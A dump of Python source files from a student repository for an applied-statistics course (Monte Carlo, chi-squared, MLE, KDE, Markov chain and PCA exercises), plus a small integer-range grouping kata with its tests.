area\nN = 100\nnumber_of_tests = 1000\nA = np.empty((1, 0))\n\n# Fill my arrays with random numbers\nfor i in range(number_of_tests):\n\n x = np.empty((1, 0))\n y = np.empty((1, 0))\n x_missed = np.empty((1, 0))\n y_missed = np.empty((1, 0))\n\n for i in range(N):\n\n x_random = random.random()\n y_random = random.random()\n if (np.sqrt(x_random**2 + y_random**2)) < 1:\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\n A = np.append(A, len(x) / N * 4 * 5.2 ** 2)\n\nbinwidth = 3\nn_bins = np.arange(min(A), max(A) + binwidth, binwidth)\nplt.figure(1)\nplt.hist(A, bins=n_bins)\n\n\nbinwidth = 1\nn_bins = np.arange(min(A), max(A) + binwidth, binwidth)\nplt.figure(2)\nplt.hist(A, bins=n_bins)\n\n\nbinwidth = 0.1\nn_bins = np.arange(min(A), max(A) + binwidth, binwidth)\nplt.figure(3)\nplt.hist(A, bins=n_bins)\nplt.show()\n" }, { "alpha_fraction": 0.6309497356414795, "alphanum_fraction": 0.6440114974975586, "avg_line_length": 36.94117736816406, "blob_id": "afb84eefb3b10e488dfbbeb2599611dcc8c8be8a", "content_id": "5b1a3b5778fb51b6e1d1db8abd1493dd9a658854", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4517, "license_type": "no_license", "max_line_length": 118, "num_lines": 119, "path": "/Week_1/Class_1/Jason_script.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "##############################\n# D. Jason Koskinen\n# Dec. 22, 2015\n#\n# The exercise herein is to take a txt file\n# and read in multiple data sets of X and Y\n# input and calculate basic statitics quantities.\n#\n# Do everything in normal python arrays and then\n# use the numpy converter to put the data into\n# numpy arrays. Why? Because numpy arrays are hard.\n#\n# The data set is somehwat of a classic in statistics\n# and is known as Anscombe's quartet.\n##############################\n\nimport io\nimport numpy as np\nimport scipy as sp\nfrom scipy import stats as stats\n\ninfile = io.open(\"FranksNumbers.txt\")\n\n# Making an empty array to fill with arrays. Normally\n# arrays of arrays is a bad sign, but it will work out\n# fine this time.\n\nmetaArray = []\n\nfor line in infile.readlines():\n splLine = line.split()\n if len(splLine) == 3:# This is when the data sets change\n metaArray.append([])\n # end if len()\n if len(splLine) == 0 or (not splLine[0].isdigit()):\n continue\n # end not if\n \n # read in from text is generally a string so make sure\n # to explicitly cast the variable as a float\n \n x = float(splLine[0])\n y = float(splLine[1])\n metaArray[-1].append([x,y])\n# end for line\n\n# Convert the array of arrays into\n# a numpy array so that nice calculations\n# can be made with ease.\n \na = np.asarray(metaArray)\n\nfor i in range(0,len(a)):\n slope = stats.linregress(a[i])[0]\n intercept = stats.linregress(a[i])[1]\n slope = 0.48\n intercept = 3.02\n # The following code 'flattens' the tuple, which then includes\n # the x-values (1st column in the file) as part of the set over\n # which to compute the variance.\n # but actually we just want to compute the variance of the y-values.\n print ('Variance for dataset %i: %f (WRONG VALUE)' % (i, np.var(a[i])))\n\n # The following code tells numpy (via the axis=0) to calculate\n # the variance over the\n # separate data columns (x and y), where we're mostly interested in the\n # variance in y. Also, there are two ways to think of the\n # exercise as written in the lecture notes:\n # A) you are given the line and therefore the degrees of freedom\n # are equal to the number of data points, or\n # B) the variance should be calculated using the 'unbiased'\n # estimator (shown on slide 3) which corrects the\n # degrees of freedom to be N-1. By default numpy uses\n # that the change to the degrees of freedom (ddof) is zero.\n # Ergo, for an unbiased estimator we maybe, possibly, kinda, sort of,\n # should use N-1 stead of N. Also, Troels said that he stressed this\n # in his class, so all of the students from his course should\n # know this.\n \n print (\"Variance for dataset %i: %f (CORRECT VALUE FOR BIASED VARIANCE)\" % (i, np.var(a[i], axis=0, ddof=0)[1]))\n print (\"Variance for dataset %i: %f (CORRECT VALUE FOR UNBIASED VARIANCE)\" % (i, np.var(a[i], axis=0, ddof=1)[1]))\n print (\"linear regression: y=%0.2fx + %0.2f\" % (stats.linregress(a[i])[0], stats.linregress(a[i])[1]))\n \n # just get the y-values, i.e. the observed data.\n # Note that this is more easily done if the data sets\n # have the exact numbers of entries, unlike here. The\n # difference is where you put the [:,1] and whether it\n # is necessary to 'recreate' a new numpy array.\n \n observed = sp.array(a[i])[:,1]\n expected = []\n chisq_value = 0\n chisq_valuewith = 0\n\n # loop over all the data points in the data set\n # to calculate the expected values of y at each\n # value of x.\n for j in range(0, len(a[i])):\n x = a[i][j][0]\n y = x*slope + intercept\n expected.append(y)\n chisq_value += (y - observed[j])*(y - observed[j])/y\n chisq_valuewith += (y - observed[j])*(y - observed[j])/(1.22*1.22)\n # end for x,y\n \n print (\"chi-squared By hand: \", chisq_value)\n print (\"chi-squared From SciPy: \", stats.chisquare(observed,expected)[0])\n print (\"chi-squared (w/ \\pm 1.22 uncertainty): \", (chisq_valuewith))\n print (\"Reduced chi-squared: \", (chisq_value)/(len(a[i])-2))\n print (\"Reduced chi-squared (w/ \\pm 1.22 uncertainty): \", (chisq_valuewith)/(len(a[i])-2))\n print (\"\\n\\n\")\n \n# end for i\n\n# There is a larger questions here related to calculation\n# of the chi-squared value; we can do it, but if we do not know\n# actually what the data is (money, number of cows, speed of a toddler, etc.)\n# can the chi-squared or the reduced chi-squared tell use\n# anything meaningful?\n\n\n" }, { "alpha_fraction": 0.5284630060195923, "alphanum_fraction": 0.5635673403739929, "avg_line_length": 22.422222137451172, "blob_id": "9606129c27c0e87490a8c1f77f0082a39a7b9a46", "content_id": "4afeb5b233120ad639278b6d573da6d83c23cda8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1054, "license_type": "no_license", "max_line_length": 65, "num_lines": 45, "path": "/Week_4/Class_7/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\nfrom scipy.stats import chisquare\n\n\nfname = 'MLE_Variance_data.txt'\n\nloaded_file = np.loadtxt(fname)\n\nx_1 = loaded_file[:, 0]\nx_2 = loaded_file[:, 1]\n\n\ndef norm(x, alpha, beta):\n upper_lim = (max(x) + 1 / 2 * alpha * (max(x) ** 2) +\n 1 / 3 * beta * (max(x) ** 3))\n lower_lim = (min(x) + 1 / 2 * alpha * (min(x) ** 2) +\n 1 / 3 * beta * (min(x) ** 3))\n\n integral = upper_lim - lower_lim\n return integral\n\n\ndef my_func(x, alpha, beta):\n return (1 + alpha * x + beta * x ** 2) / norm(x, alpha, beta)\n\n\nbinwidth = 0.05\nn_bins = np.arange(min(x_1), max(x_1) + binwidth, binwidth)\ny, x, _ = plt.hist(x_1, bins=n_bins, normed=1)\n\nx = x + binwidth / 2\n\npopt, pcov = curve_fit(my_func, x[0:-1], y)\n\nplt.plot(x, my_func(x, *popt), 'r--',\n label='fit: a=%5.3f, b=%5.3f' % tuple(popt))\n\nplt.plot(x[0:-1], y, linestyle='none', marker='.')\nplt.legend()\nplt.show()\n\n\nprint(chisquare(y, my_func(x[0:-1], *popt), ddof=len(y)-2))\n" }, { "alpha_fraction": 0.45143386721611023, "alphanum_fraction": 0.48843663930892944, "avg_line_length": 26.024999618530273, "blob_id": "7f95e65a51a41318e8abd5b452b0028f6870cd9a", "content_id": "fbb8b3522dbb5ad45a2c844324b18f8751daaf7c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1081, "license_type": "no_license", "max_line_length": 72, "num_lines": 40, "path": "/Week_6/Class_12/exercise_1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\n\n\ndef test_statistic(N):\n\n N_bins = len(N)\n N_tot = np.sum(N)\n x = N[0]\n\n if x == 0:\n result = (2 * N_tot * np.log(N_bins / N_tot *\n N_tot / (N_bins - 1)))\n elif (N_tot - x) == 0:\n result = (2 * x * np.log(N_bins / N_tot * x))\n else:\n result = (2 * x * np.log(N_bins / N_tot * x) +\n 2 * (N_tot - x) * np.log(N_bins / N_tot *\n (N_tot - x) / (N_bins - 1)))\n return result\n\n\nN = 1000\nmy_lambda = [0.1, 10, 1000]\n\nfor i, the_lambda in enumerate(my_lambda, 1):\n vars()['TS_' + str(i)] = np.array([])\n for _ in range(N):\n s = np.random.poisson(the_lambda, 100)\n temp = test_statistic(s)\n vars()['TS_' + str(i)] = np.append(vars()['TS_' + str(i)], temp)\n\n# binwidth = 0.05\n# n_bins = np.arange(min(s), max(s) + binwidth, binwidth)\nplt.hist(TS_1, log=True, bins=100)\nplt.figure()\nplt.hist(TS_2, log=True, bins=100)\nplt.figure()\nplt.hist(TS_3, log=True, bins=100)\nplt.show()\n" }, { "alpha_fraction": 0.7150259017944336, "alphanum_fraction": 0.7357512712478638, "avg_line_length": 16.636363983154297, "blob_id": "1e895394d1f93d3a12c9dc5e9be4583f54a62020", "content_id": "23fc7521582c6f2a4fff42918eb562d86b450d96", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 193, "license_type": "no_license", "max_line_length": 39, "num_lines": 11, "path": "/Week_6/Class_12/untitled.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport xgboost as xgb\n\ndata = np.random.rand(5, 3)\nlabel = np.random.randint(2, size=5)\n\ndtrain = xgb.DMatrix(data, label=label)\n\nprint(data)\nprint(label.shape)\nprint(dtrain)" }, { "alpha_fraction": 0.5116550326347351, "alphanum_fraction": 0.5396270155906677, "avg_line_length": 18.930233001708984, "blob_id": "5081def7f09b99b2ccf12bcb85762ad5b833cc74", "content_id": "ee15bf12ae60c903414663726ca680d2199755b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 858, "license_type": "no_license", "max_line_length": 63, "num_lines": 43, "path": "/Week_3/Class_6/markov_chain_3.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.stats import beta\nfrom scipy.stats import binom\n\nmu = 0\nsigma = 0.3\n\na = 5\nb = 17\nx = 0.1\n\nn = 100\nk = 66\n\n\nkeept = np.array([])\n\nfor i in np.arange(2000):\n\n x_new = x + np.random.normal(mu, sigma, 1)\n\n if x_new < 0:\n x_new = x + np.random.normal(mu, sigma, 1)\n\n r = (beta.pdf(x_new, a, b) * binom.pmf(k, n, x_new) /\n (beta.pdf(x, a, b) * binom.pmf(k, n, x)))\n if r > 1:\n keept = np.append(keept, x_new)\n x = x_new\n else:\n keep_or_not = np.random.uniform()\n if r > keep_or_not:\n keept = np.append(keept, x_new)\n x = x_new\n else:\n keept = np.append(keept, x)\n x = x\n\nbinwidth = 0.01\nn_bins = np.arange(min(keept), max(keept) + binwidth, binwidth)\nplt.hist(keept, bins=n_bins)\nplt.show()\n\n" }, { "alpha_fraction": 0.6353658437728882, "alphanum_fraction": 0.6658536791801453, "avg_line_length": 20.605262756347656, "blob_id": "c0fb2de6428742c8092966eda43e21b0ffa57e72", "content_id": "a32e8cde363765340c422ddae9265d78a035ea24", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 820, "license_type": "no_license", "max_line_length": 80, "num_lines": 38, "path": "/Project/open_files.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import pandas as pd\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfile = 'digit-recognizer/train.csv'\ndata = pd.read_csv(file)\n\n\n# print(data.head())\n# print(data.iloc[0, 1::])\n\n\nnumpy_data = data.values\ndata_mean_vector = np.mean(numpy_data[:, 1:], axis=0)\n\ndata_tilte = (numpy_data[:, 1:] - data_mean_vector)\ncov_mat = np.cov(data_tilte.T)\neig_vals, eig_vecs = np.linalg.eig(cov_mat)\n\neig_pairs = [ (np.abs(eig_vals[i]),eig_vecs[:,i]) for i in range(len(eig_vals))]\neig_pairs.sort(key = lambda x: x[0], reverse= True)\n\n\nimage = numpy_data[0, 1:].reshape((28, 28))\nimage1 = data_tilte[0, :].reshape((28, 28))\n\nplt.imshow(image, cmap='hot')\nplt.colorbar()\n\nplt.figure()\n\nplt.imshow(image1, cmap='hot')\nplt.colorbar()\nplt.figure()\n\nplt.imshow(eig_pairs[1][1].reshape((28, 28)), cmap='hot')\nplt.colorbar()\nplt.show()" }, { "alpha_fraction": 0.5172228217124939, "alphanum_fraction": 0.5683530569076538, "avg_line_length": 18.5473690032959, "blob_id": "27edc753ebb9d60715a2ffa25d77e69ef363d010", "content_id": "eb91cb2967c765493c2909b59173b4a4de8bd524", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1858, "license_type": "no_license", "max_line_length": 98, "num_lines": 95, "path": "/Exam_prep/test_prob1.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import minimize\nfrom scipy.stats import chisquare, chi2, binom, poisson\n\n\ndef f_1(x, a):\n return (1 / (x + 5)) * np.sin(a * x)\n\n\ndef f_2(x, a):\n return np.sin(a * x) + 1\n\n\ndef f_3(x, a):\n return np.sin(a * (x ** 2))\n\n\ndef f_4(x, a):\n return np.sin(a * x + 1) ** 2\n\n\ndef f_5(x):\n return x * np.tan(x)\n\n\ndef f_6(x, a, b):\n return (1 + a * x + b * (x ** 2)) / ((2/3) * (b + 3)) \n\n\ndef f_7(x, a, b):\n return a + b * x\n\n\ndef f_8(x, a, b, c):\n return np.sin(a * x) + c * np.exp(b * x) + 1\n\n\ndef f_9(x, a, b):\n return np.exp(-(x - a) ** 2 / (2 * (b ** 2)))\n\ndef my_pdf(VAR, x):\n a = VAR\n\n pdf = f_1(x, a)\n\n ln_pdf = np.log((pdf))\n result = np.sum(-ln_pdf)\n return result\n\n\nfname = 'Exam_2018_Prob1.txt'\ndata = np.loadtxt(fname)\n\nz = data[:, 0]\n\na_bound = (-10, 0)\nb_bound = (-10, 10)\nc_bound = (4000, 8000)\n\nn_bound = (0, None)\np_bound = (0, None)\n\nmu_bound = (0, None)\n\ndata_0 = minimize(my_pdf, [1, ], args=(z), method='SLSQP',\n bounds=(a_bound, ))\n\n\nprint(data_0)\nx = np.arange(20, 27, 0.01)\ny = f_1(x, -3)\nplt.plot(x, y+0.2)\nplt.hist(z, bins=200, normed=True)\nplt.show()\nbinwidth = 0.1\nn_bins = np.arange(min(data[:, 2]), max(data[:, 2]) + binwidth, binwidth)\n\n# Chi2 calculator\n# observed_values, bins, _ = plt.hist(data[:, 2], bins=n_bins)\n\n# plt.show()\n# We normalize by multiplyting the length of the data with the binwidth\n# expected_values = poisson.pmf(bins, data_0.x[0]) * len(data) \n\n# print(observed_values[observed_values!=0])\n# print(expected_values[expected_values!=0])\n# print(chisquare(observed_values[observed_values!=0], f_exp=expected_values[expected_values!=0]))\n# print('Threshold value ', chi2.isf(0.05, 18))\n\n\n# x = np.arange(-1, 1, 0.01)\n# y = f_6(x, data_0.x[0], data_0.x[1]) \n# plt.plot(x,y)\n# plt.show()\n\n" }, { "alpha_fraction": 0.5875542759895325, "alphanum_fraction": 0.6620839238166809, "avg_line_length": 32.73170852661133, "blob_id": "1178b35361c9c76c135bba66322333731c034d01", "content_id": "5c20e4d39b9db2e6c4eb6acd86616288a7a5e89c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1382, "license_type": "no_license", "max_line_length": 83, "num_lines": 41, "path": "/Week_2/Class_4/spline_2.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nfrom scipy.interpolate import interp1d\nimport matplotlib.pyplot as plt\nimport scipy.integrate as integrate\n\n\nfname = 'SplineCubic.txt'\n\nloaded_file = np.loadtxt(fname)\n\nx = loaded_file[:, 0]\ny = loaded_file[:, 1]\n\nf = interp1d(x, y)\nf1 = interp1d(x, y, kind='cubic')\nf2 = interp1d(x, y, kind='quadratic')\n\nx_new = np.linspace(min(x), max(x), len(x)*1000, endpoint=True)\n\nplt.plot(x, y, 'k', marker='o', markersize='2', linestyle='none')\nplt.plot(x, f(x), 'b', linestyle='--')\nplt.plot(x_new, f1(x_new), 'r--')\nplt.plot(x_new, f2(x_new), 'g--')\n\nplt.show()\n\nresult = integrate.quad(lambda x: f(x), 10e-5, 0.01)\nresult_cubic = integrate.quad(lambda x: f1(x), 10e-5, 0.01)\nresult_quadradic = integrate.quad(lambda x: f2(x), 10e-5, 0.01)\n\nprint('Integral of Normal from 10e-5 to 0.01 is: %8.2f' % (result[0]))\nprint('Integral of Cubic from 10e-5 to 0.01 is: %8.2f' % (result_cubic[0]))\nprint('Integral of Quadratic from 10e-5 to 0.01 is: %8.2f' % (result_quadradic[0]))\n\nresult = integrate.quad(lambda x: f(x), 0.03, 0.1)\nresult_cubic = integrate.quad(lambda x: f1(x), 0.03, 0.1)\nresult_quadradic = integrate.quad(lambda x: f2(x), 0.03, 0.1)\n\nprint('Integral of Normal from 0.03 to 0.1 is: %8.2f' % (result[0]))\nprint('Integral of Cubic from 0.03 to 0.1 is: %8.2f' % (result_cubic[0]))\nprint('Integral of Quadratic from 0.03 to 0.1 is: %8.2f' % (result_quadradic[0]))" }, { "alpha_fraction": 0.47252747416496277, "alphanum_fraction": 0.5560439825057983, "avg_line_length": 13.612903594970703, "blob_id": "bff1a507e2079de4b569a2f965b16b4a4ba626a7", "content_id": "20595de58292ac67f7ef7767c2214e025f4bb93c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 455, "license_type": "no_license", "max_line_length": 92, "num_lines": 31, "path": "/Week_2/Class_3/simple_example_likelyhood.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\n\n\nx = np.array([1.01, 1.3, 1.35, 1.44])\n\n\ndef my_gauss(x, mu, sigma):\n result = 1/(np.sqrt(2 * np.pi * sigma ** 2)) * np.exp(-(x - mu) ** 2 / (2 * sigma ** 2))\n return result\n\n\nmu = 1.25\nsigma = np.sqrt(0.11)\n\n\nanswer_1 = 1\n\nfor i in x:\n answer_1 = answer_1 * my_gauss(i, mu, sigma)\n\nmu = 1.30\nsigma = np.sqrt(0.5)\n\n\nanswer_2 = 1\n\nfor i in x:\n answer_2 = answer_2 * my_gauss(i, mu, sigma)\n\nprint(answer_1)\nprint(answer_2)\n\n\n" }, { "alpha_fraction": 0.580136239528656, "alphanum_fraction": 0.6453925967216492, "avg_line_length": 27.1616153717041, "blob_id": "e60e1e5c81f56245b0ce94a79954b1121579d579", "content_id": "941e3b24dfb598819b8209112fd7ecd86c6fbbf8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2789, "license_type": "no_license", "max_line_length": 66, "num_lines": 99, "path": "/Problem_set_2/problem_4.py", "repo_name": "DanielRamyar/AdvancedMethodsInAppliedStatistics", "src_encoding": "UTF-8", "text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.neighbors import KernelDensity\nfrom scipy import integrate\nimport random\n\nrandom.seed(148)\n\n# Deletes -99.99 from array and return flattened array\ndef remove_99(arr):\n temp = np.argwhere(arr == -99.99).flatten()\n return np.delete(arr.flatten(), temp)\n\n\n# Load list of data into dictionary\ndef load_data(fnames):\n data = {name: np.loadtxt(name, skiprows=1) for name in fnames}\n return data\n\n\nfnames = ['GlobalTemp_1.txt', 'GlobalTemp_2.txt']\ndata = load_data(fnames)\n\n# Sanity check\nprint(data['GlobalTemp_1.txt'][6, 0]) # Should be 0.74\nprint(data['GlobalTemp_2.txt'][6, 0]) # Should be 1.07\n\n# Remove -99.99 from row 8\ndata_row8_1997 = remove_99(data['GlobalTemp_1.txt'][6, None])\ndata_row8_2017 = remove_99(data['GlobalTemp_2.txt'][6, None])\n\nx1 = np.linspace(-2, 4, 1000)\nx2 = np.linspace(-2, 4, 1000)\nkde1 = KernelDensity(kernel='epanechnikov',\n bandwidth=0.4).fit(data_row8_1997[:, None])\nkde2 = KernelDensity(kernel='epanechnikov',\n bandwidth=0.4).fit(data_row8_2017[:, None])\n\n\ndef f_kde1(x):\n return np.exp((kde1.score_samples([[x]])))\n\n\ndef f_kde2(x):\n return np.exp((kde2.score_samples([[x]])))\n\n\n# Remember score_samples return log(probability density) !!!!!\np1 = np.exp(kde1.score_samples(x1[:, None]))\np2 = np.exp(kde2.score_samples(x2[:, None]))\n\nprint('Integrating kde1 from -2 to 4 gives: %.2f' %\n integrate.quad(f_kde1, -2, 4)[0])\nprint('Integrating kde2 from -2 to 4 gives: %.2f' %\n integrate.quad(f_kde2, -2, 4)[0])\nprint('Integrating kde1 from -2 to 0 gives: %.2f' %\n integrate.quad(f_kde1, -2, 0)[0])\nprint('Integrating kde2 from -2 to 0 gives: %.2f' %\n integrate.quad(f_kde2, -2, 0)[0])\n\n\nN = 1000\nn_hit = 0\n# Fill my arrays with random numbers\n\nx = np.empty((1, 0))\ny = np.empty((1, 0))\nx_missed = np.empty((1, 0))\ny_missed = np.empty((1, 0))\n\nwhile n_hit < 1000:\n\n x_random = random.uniform(-1, 2)\n y_random = random.uniform(0, 1)\n if y_random < f_kde1(x_random):\n x = np.append(x, x_random)\n y = np.append(y, y_random)\n n_hit += 1\n else:\n x_missed = np.append(x_missed, x_random)\n y_missed = np.append(y_missed, y_random)\n\nLikelihood_0 = np.exp((kde1.score_samples(x[:, None])))\nLikelihood_1 = np.exp((kde2.score_samples(x[:, None])))\n\nLikelihood_ratio = Likelihood_0 / Likelihood_1\n\nprint('Ratio is:', np.prod(Likelihood_ratio))\n\nnp.savetxt('ramyar_KDE_1000_samples.txt', x)\n\nplt.figure(figsize=(7,4))\nplt.plot(x1, p1, label='KDE Epanechnikov 1997 Data')\nplt.plot(x2, p2, label='KDE Epanechnikov 2017 Data')\nplt.plot(x, y, label='1000 Samples from 1997 KDE', marker='.',\n linestyle='None', markersize=2)\nplt.legend()\nplt.savefig('kdeplots', dpi=200)\n# plt.show()\n\n" } ]
48
LuanComputacao/katas_sequencia_numerica
https://github.com/LuanComputacao/katas_sequencia_numerica
247921f28c458cfdcd9c5b6a4e84b68c519e9f62
12e8bc0398bfda643dad0a93bc2fb7d57e066579
00cfc8da7773299eec4794771ee16353fff4a16a
refs/heads/master
2022-01-26T13:56:08.723942
2019-09-15T06:30:19
2019-09-15T06:30:19
208,521,739
1
0
null
2019-09-15T00:39:09
2020-01-24T17:27:25
2022-01-21T19:53:46
Python
[ { "alpha_fraction": 0.4661654233932495, "alphanum_fraction": 0.6090225577354431, "avg_line_length": 23.18181800842285, "blob_id": "866e8855f590ce776e882a8421c641ebb2121692", "content_id": "366e3b89a91ade619a3ce284a28ffb004c60b115", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 266, "license_type": "no_license", "max_line_length": 82, "num_lines": 11, "path": "/workshop.py", "repo_name": "LuanComputacao/katas_sequencia_numerica", "src_encoding": "UTF-8", "text": "import io\nimport sys\nfrom src.agrupador import group\n\nif __name__ == \"__main__\":\n '''\n use o seguinte comando para executar\n \n python -m unittest test_workshop.py\n '''\n print(group([100, 101, 102, 103, 104, 105, 110, 111, 113, 114, 115, 150, 70]))\n" }, { "alpha_fraction": 0.6214285492897034, "alphanum_fraction": 0.6299999952316284, "avg_line_length": 24.301204681396484, "blob_id": "484883e53fe1cb47e9829a9f9ab386731a325e6d", "content_id": "25fadc064af9b5adc8b54960f581db20b98d2204", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2101, "license_type": "no_license", "max_line_length": 83, "num_lines": 83, "path": "/src/agrupador.py", "repo_name": "LuanComputacao/katas_sequencia_numerica", "src_encoding": "UTF-8", "text": "#\n\"\"\"\nDado uma lista de números inteiros, agrupe a lista em um conjunto de intervalos\n\n\"\"\"\n\n\ndef group(numbers):\n \"\"\" Group the number sequences\n :param numbers: \n :return: \n \"\"\"\n groups = find_sequences(numbers)\n groups = [sequence_to_string(sequence) for sequence in groups]\n\n return groups\n\n\ndef find_sequences(numbers):\n \"\"\"Sort the sequence and returns the splited sequence\n \n :param numbers: numbers list\n :return: list of sequences\n \"\"\"\n numbers = list(set(numbers))\n numbers.sort()\n\n return group_sequences(numbers)\n\n\ndef group_sequences(numbers, sequences=[]):\n \"\"\"Group a numbers list into sequence representations\n \n :param numbers: \n :param sequences: list of numbers list of sequence representation\n :return: \n \"\"\"\n starts = numbers[0]\n ends, depth = sequence_ends(numbers)\n\n numbers = numbers[depth + 1:]\n sequence = [starts, ends] if ends - starts > 0 else [starts]\n\n new_sequences = sequences + [sequence]\n\n if len(numbers) < 1:\n return new_sequences\n else:\n return group_sequences(numbers, new_sequences)\n\n\ndef sequence_ends(numbers, depth=0):\n \"\"\"Find the last number of a sequence of the first number\n \n :param numbers: numbers list\n :type numbers: list\n :param depth: amount of numbers forwarded\n :type depth: int\n :return: The number and the forwarded steps to the last number of the sequence\n :rtype list:\n \"\"\"\n if len(numbers) > 1:\n if numbers[1] - numbers[0] != 1:\n return [numbers[0], depth]\n else:\n return sequence_ends(numbers[1:], int(depth + 1))\n\n return [numbers[0], depth]\n\n\ndef sequence_to_string(starts_ends):\n \"\"\"Convert the sequence list representation to a sequence string representation\n \n :param starts_ends: \n :return: \n \"\"\"\n len_starts_ends = len(starts_ends)\n if len_starts_ends == 1:\n return \"[{}]\".format(str(starts_ends[0]))\n elif len_starts_ends == 2:\n return \"[{}-{}]\".format(str(starts_ends[0]), str(starts_ends[1]))\n else:\n return \"[-]\"\n" }, { "alpha_fraction": 0.4482758641242981, "alphanum_fraction": 0.6724137663841248, "avg_line_length": 13.75, "blob_id": "628a7dd394c8f273de6668e070dec897fb1369d6", "content_id": "2c559a3916a4f908bd717dc773408f719ec0851a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 58, "license_type": "no_license", "max_line_length": 15, "num_lines": 4, "path": "/requirements.txt", "repo_name": "LuanComputacao/katas_sequencia_numerica", "src_encoding": "UTF-8", "text": "autopep8==1.3.3\nipython==5.8.0\npylint==1.5.5\npytest==4.6.5" }, { "alpha_fraction": 0.5567567348480225, "alphanum_fraction": 0.6702702641487122, "avg_line_length": 13.945945739746094, "blob_id": "d66254321b85a18110fbcd3612e18960fca5777b", "content_id": "ba814ef671640da0e93935e2a6270d765a7a7d01", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 559, "license_type": "no_license", "max_line_length": 79, "num_lines": 37, "path": "/README.md", "repo_name": "LuanComputacao/katas_sequencia_numerica", "src_encoding": "UTF-8", "text": "# Code Kata: Intervalos\n\n## Descrição\n\nDado uma lista de números inteiros, agrupe a lista em um conjunto de intervalos\n\nExemplo:\n\n### Entrada:\n\n```python\ninput = [100, 101, 102, 103, 104, 105, 110, 111, 113, 114, 115, 150, 70]\n```\n\n### Saída:\n```python\noutput = [70], [100-105], [110-111], [113-115], [150]\n```\n\n## Running\n\nCreate the virtual environment\n\n```commandline\nvirtualenv -p /usr/bin/python3.6 venv\n```\n\nLoad the virtual env\n\n```commandline\nsource venv/bin/activate\n```\n\nInstall the modules\n```commandline\npip install -r requirements.txt \n```\n\n\n" }, { "alpha_fraction": 0.5351364612579346, "alphanum_fraction": 0.6068582534790039, "avg_line_length": 43.52688217163086, "blob_id": "6043808abe5285375c2c843acd96fbd4340f4e33", "content_id": "303ef7880d1e079047ca49f3064599d513afcc7e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4141, "license_type": "no_license", "max_line_length": 99, "num_lines": 93, "path": "/test/test_agrupa.py", "repo_name": "LuanComputacao/katas_sequencia_numerica", "src_encoding": "UTF-8", "text": "from src.agrupador import group, sequence_to_string, sequence_ends, group_sequences, find_sequences\nimport unittest\n\n\nclass TestGroup(unittest.TestCase):\n def test_deve_retornar_o_proprio_numero(self):\n self.assertEqual(group([100]), [\"[100]\"])\n\n def test_deve_retornar_dois_conjuntos_de_um_numero(self):\n self.assertEqual(group([100, 102]), [\"[100]\", \"[102]\"])\n\n def test_deve_retornar_um_conjunto_com_apenas_uma_sequencia(self):\n self.assertEqual(group([100, 101]), [\"[100-101]\"])\n\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros(self):\n self.assertEqual(group(range(100, 150 + 1)), [\"[100-150]\"])\n\n def test_deve_retornar_um_conjunto_para_sequencia_de_n_numeros_e_um_numero(self):\n self.assertEqual(group(list(range(100, 150 + 1)) +\n [70]), [\"[70]\", \"[100-150]\"])\n\n def test_deve_retornar_dois_conjuntos_para_sequencia_de_n_numeros_e_um_numero(self):\n self.assertEqual(group(list(range(100, 150 + 1)) + list(range(0, 50 + 1)) +\n [70]), [\"[0-50]\", \"[70]\", \"[100-150]\"])\n\n\nclass TestFormata(unittest.TestCase):\n def test_deve_retornar_grupo_de_um_numero_apenas(self):\n self.assertEqual(sequence_to_string([100]), \"[100]\")\n\n def test_deve_retornar_grupo_de_dois_numeros(self):\n self.assertEqual(sequence_to_string([100, 101]), \"[100-101]\")\n\n def test_deve_retornar_grupo_de_tres_numeros(self):\n self.assertEqual(sequence_to_string([100, 101, 132]), \"[-]\")\n\n\nclass TestSequenceEnds(unittest.TestCase):\n def test_deve_retornar_o_primeiro_e_unicao_numero(self):\n self.assertEqual(sequence_ends([100]), [100, 0])\n\n def test_deve_retornar_o_segundo_da_sequencia(self):\n self.assertEqual(sequence_ends([100, 101]), [101, 